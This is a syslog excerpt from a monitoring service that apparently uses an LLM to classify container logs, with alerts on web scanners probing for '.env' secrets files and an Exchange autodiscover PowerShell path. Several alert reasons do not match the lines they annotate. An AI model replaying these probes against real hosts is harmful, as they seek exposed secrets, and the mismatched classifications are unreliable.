07:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:21:31.936766 [observer] Patterns: hash=2708 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:22:01.970195 [observer] Pipeline: processed=2770 pattern_hits=2711 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:22:01.970226 [observer] Patterns: hash=2711 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:22:31.935577 [observer] Pipeline: processed=2774 pattern_hits=2715 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:22:31.935605 [observer] Patterns: hash=2715 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:23:01.950115 [observer] Pipeline: processed=2776 pattern_hits=2717 llm_calls=59 llm_errors=0 learned=0 Mar 20 
07:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:23:01.950143 [observer] Patterns: hash=2717 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:23:31.948748 [observer] Pipeline: processed=2778 pattern_hits=2719 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:23:31.948779 [observer] Patterns: hash=2719 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:24:01.981938 [observer] Pipeline: processed=2782 pattern_hits=2723 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:24:01.981971 [observer] Patterns: hash=2723 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:24:31.945075 [observer] Pipeline: processed=2784 pattern_hits=2725 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:24:31.945109 [observer] Patterns: hash=2725 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:25:01.973458 [observer] Pipeline: processed=2790 pattern_hits=2731 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:25:01.973495 [observer] Patterns: hash=2731 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:25:31.936189 [observer] Pipeline: processed=2792 pattern_hits=2733 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:25:31.936219 [observer] Patterns: hash=2733 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:26:01.943051 [observer] Pipeline: 
processed=2796 pattern_hits=2737 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:26:01.943932 [observer] Patterns: hash=2737 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:26:31.934690 [observer] Pipeline: processed=2798 pattern_hits=2739 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:26:31.934714 [observer] Patterns: hash=2739 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:27:01.947178 [observer] Pipeline: processed=2800 pattern_hits=2741 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:27:01.947210 [observer] Patterns: hash=2741 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:27:31.936359 [observer] Pipeline: processed=2804 pattern_hits=2745 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:27:31.936381 [observer] Patterns: hash=2745 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:28:01.955621 [observer] Pipeline: processed=2806 pattern_hits=2747 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:28:01.955657 [observer] Patterns: hash=2747 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:28:31.933911 [observer] Pipeline: processed=2810 pattern_hits=2751 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:28:31.933936 [observer] Patterns: hash=2751 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:29:01 ip-172-26-12-110 
observer[1565011]: 2026/03/20 07:29:01.957961 [observer] Pipeline: processed=2812 pattern_hits=2753 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:29:01.957993 [observer] Patterns: hash=2753 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:29:31.935609 [observer] Pipeline: processed=2816 pattern_hits=2757 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:29:31.935641 [observer] Patterns: hash=2757 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:30:01.950984 [observer] Pipeline: processed=2818 pattern_hits=2759 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:30:01.951018 [observer] Patterns: hash=2759 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:30:31.952294 [observer] Pipeline: processed=2822 pattern_hits=2763 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:30:31.952319 [observer] Patterns: hash=2763 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:31:01.947068 [observer] Pipeline: processed=2826 pattern_hits=2767 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:31:01.947097 [observer] Patterns: hash=2767 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:31:31.945756 [observer] Pipeline: processed=2828 pattern_hits=2769 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:31:31.945787 [observer] Patterns: hash=2769 prefix=0 regex=0 contains=0 
deny=9 alert=35 suppress=0 misses=59 Mar 20 07:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:32:01.946586 [observer] Pipeline: processed=2832 pattern_hits=2773 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:32:01.946613 [observer] Patterns: hash=2773 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:32:31.939518 [observer] Pipeline: processed=2834 pattern_hits=2775 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:32:31.939551 [observer] Patterns: hash=2775 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:33:01.937587 [observer] Pipeline: processed=2838 pattern_hits=2779 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:33:01.937614 [observer] Patterns: hash=2779 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:33:31.934797 [observer] Pipeline: processed=2840 pattern_hits=2781 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:33:31.934825 [observer] Patterns: hash=2781 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:34:01.958118 [observer] Pipeline: processed=2842 pattern_hits=2783 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:34:01.958148 [observer] Patterns: hash=2783 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59 Mar 20 07:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:34:31.934130 [observer] Pipeline: processed=2846 pattern_hits=2787 llm_calls=59 llm_errors=0 learned=0 Mar 20 07:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 
07:34:31.934153 [observer] Patterns: hash=2787 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=59
Mar 20 07:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:34:54.717107 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 20 07:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:34:54.717147 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 07:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:01.966131 [observer] Pipeline: processed=2850 pattern_hits=2789 llm_calls=61 llm_errors=0 learned=0
Mar 20 07:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:01.966759 [observer] Patterns: hash=2789 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=61
Mar 20 07:35:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:03.748256 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 07:35:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:03.748303 [analyzer] Source hint mismatch: LLM says "tc-qos-helper", actual is "captain-netdata-container" — skipping pattern
Mar 20 07:35:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:08.649947 [analyzer] LLM verdict for docker:captain-netdata-container: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 07:35:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:08.649979 [SUSPICIOUS] Source=docker:captain-netdata-container Reason=A missing configuration file warning could indicate misconfiguration or incomplete setup, which is noteworthy but not confirmed as malicious. Line=2026-03-20T07:34:47.587141727Z 2026-03-20 07:34:47: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.
Mar 20 07:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:31.935385 [observer] Pipeline: processed=2857 pattern_hits=2795 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:35:31.935415 [observer] Patterns: hash=2795 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62 Mar 20 07:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:36:01.947958 [observer] Pipeline: processed=2860 pattern_hits=2798 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:36:01.947989 [observer] Patterns: hash=2798 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62 Mar 20 07:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:36:31.935422 [observer] Pipeline: processed=2864 pattern_hits=2802 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:36:31.935446 [observer] Patterns: hash=2802 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62 Mar 20 07:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:37:01.941639 [observer] Pipeline: processed=2866 pattern_hits=2804 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:37:01.941669 [observer] Patterns: hash=2804 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62 Mar 20 07:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:37:31.950492 [observer] Pipeline: processed=2868 pattern_hits=2806 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:37:31.950524 [observer] Patterns: hash=2806 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62 Mar 20 07:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:38:01.943513 [observer] Pipeline: processed=2872 pattern_hits=2810 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:38:01.943539 [observer] Patterns: hash=2810 
prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62 Mar 20 07:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:38:31.937325 [observer] Pipeline: processed=2874 pattern_hits=2812 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:38:31.937415 [observer] Patterns: hash=2812 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62 Mar 20 07:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:39:01.964081 [observer] Pipeline: processed=2878 pattern_hits=2816 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:39:01.964112 [observer] Patterns: hash=2816 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62 Mar 20 07:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:39:31.943576 [observer] Pipeline: processed=2880 pattern_hits=2818 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:39:31.943608 [observer] Patterns: hash=2818 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62 Mar 20 07:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:40:01.948281 [observer] Pipeline: processed=2884 pattern_hits=2822 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:40:01.948312 [observer] Patterns: hash=2822 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62 Mar 20 07:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:40:31.933990 [observer] Pipeline: processed=2888 pattern_hits=2826 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:40:31.934013 [observer] Patterns: hash=2826 prefix=0 regex=0 contains=0 deny=9 alert=35 suppress=0 misses=62 Mar 20 07:40:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:40:51.888187 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, 
which is a common probe for exposed configuration data. Line=2026-03-20T07:40:51.887886590Z 2026/03/20 07:40:51 [error] 422#422: *747005 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 198.37.118.111, server: _, request: "G...
Mar 20 07:40:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:40:51.888261 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T07:40:51.887896314Z 198.37.118.111 - - [20/Mar/2026:07:40:51 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li...
Mar 20 07:40:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:40:52.398039 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T07:40:52.397751592Z 198.37.118.111 - - [20/Mar/2026:07:40:52 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like G...
Mar 20 07:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:41:01.948699 [observer] Pipeline: processed=2893 pattern_hits=2831 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:41:01.948728 [observer] Patterns: hash=2831 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62 Mar 20 07:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:41:31.933917 [observer] Pipeline: processed=2897 pattern_hits=2835 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:41:31.933942 [observer] Patterns: hash=2835 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62 Mar 20 07:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:42:01.936707 [observer] Pipeline: processed=2899 pattern_hits=2837 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:42:01.936733 [observer] Patterns: hash=2837 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62 Mar 20 07:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:42:31.936955 [observer] Pipeline: processed=2903 pattern_hits=2841 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:42:31.936988 [observer] Patterns: hash=2841 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62 Mar 20 07:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:43:01.949109 [observer] Pipeline: processed=2905 pattern_hits=2843 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:43:01.949142 [observer] Patterns: hash=2843 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62 Mar 20 07:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:43:31.935833 [observer] Pipeline: processed=2909 pattern_hits=2847 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:43:31.935983 [observer] Patterns: 
hash=2847 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62 Mar 20 07:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:44:01.961142 [observer] Pipeline: processed=2911 pattern_hits=2849 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:44:01.961190 [observer] Patterns: hash=2849 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62 Mar 20 07:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:44:31.951678 [observer] Pipeline: processed=2913 pattern_hits=2851 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:44:31.951706 [observer] Patterns: hash=2851 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62 Mar 20 07:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:45:01.938625 [observer] Pipeline: processed=2917 pattern_hits=2855 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:45:01.938651 [observer] Patterns: hash=2855 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62 Mar 20 07:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:45:31.937101 [observer] Pipeline: processed=2921 pattern_hits=2859 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:45:31.937131 [observer] Patterns: hash=2859 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62 Mar 20 07:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:46:01.955986 [observer] Pipeline: processed=2925 pattern_hits=2863 llm_calls=62 llm_errors=0 learned=0 Mar 20 07:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:46:01.956024 [observer] Patterns: hash=2863 prefix=0 regex=0 contains=0 deny=10 alert=37 suppress=0 misses=62 Mar 20 07:46:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:46:26.967115 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 
action=alert pattern_type=
Mar 20 07:46:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:46:26.967155 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An attempt to access the version endpoint resulting in a file-not-found error. Could indicate probing for version information or misconfiguration; not definitive malicious activity but warrants scrutiny. Line=2026-03-20T07:46:19.020916181Z 2026/03/20 07:46:19 [error] 422#422: *747056 open() "/usr/share/nginx/default/version" failed (2: No such file or directory), client: 40.80.200.216, server: _, request: ...
Mar 20 07:46:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:46:26.967259 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T07:46:19.021008008Z 40.80.200.216 - - [20/Mar/2026:07:46:19 +0000] "54.200.221.0" "GET /version HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-"
Mar 20 07:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:46:31.937557 [observer] Pipeline: processed=2929 pattern_hits=2866 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:46:31.937585 [observer] Patterns: hash=2866 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:47:01.955102 [observer] Pipeline: processed=2933 pattern_hits=2870 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:47:01.955137 [observer] Patterns: hash=2870 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63
Mar 20 07:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:47:31.941960 [observer] Pipeline: processed=2935 pattern_hits=2872 llm_calls=63 llm_errors=0 learned=0
Mar 20 07:47:31 ip-172-26-12-110
observer[1565011]: 2026/03/20 07:47:31.941983 [observer] Patterns: hash=2872 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:48:01.955481 [observer] Pipeline: processed=2937 pattern_hits=2874 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:48:01.955508 [observer] Patterns: hash=2874 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:48:31.938315 [observer] Pipeline: processed=2941 pattern_hits=2878 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:48:31.938340 [observer] Patterns: hash=2878 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:49:01.958715 [observer] Pipeline: processed=2943 pattern_hits=2880 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:49:01.958749 [observer] Patterns: hash=2880 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:49:31.934015 [observer] Pipeline: processed=2947 pattern_hits=2884 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:49:31.934044 [observer] Patterns: hash=2884 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:50:01.941962 [observer] Pipeline: processed=2949 pattern_hits=2886 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:50:01.941992 [observer] Patterns: hash=2886 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:50:31.935097 [observer] Pipeline: processed=2955 
pattern_hits=2892 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:50:31.935126 [observer] Patterns: hash=2892 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:51:01.957856 [observer] Pipeline: processed=2957 pattern_hits=2894 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:51:01.957994 [observer] Patterns: hash=2894 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:51:31.951106 [observer] Pipeline: processed=2959 pattern_hits=2896 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:51:31.951134 [observer] Patterns: hash=2896 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:52:01.982120 [observer] Pipeline: processed=2963 pattern_hits=2900 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:52:01.982150 [observer] Patterns: hash=2900 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:52:31.944545 [observer] Pipeline: processed=2965 pattern_hits=2902 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:52:31.944568 [observer] Patterns: hash=2902 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:53:01.965501 [observer] Pipeline: processed=2969 pattern_hits=2906 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:53:01.965620 [observer] Patterns: hash=2906 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:53:31 ip-172-26-12-110 
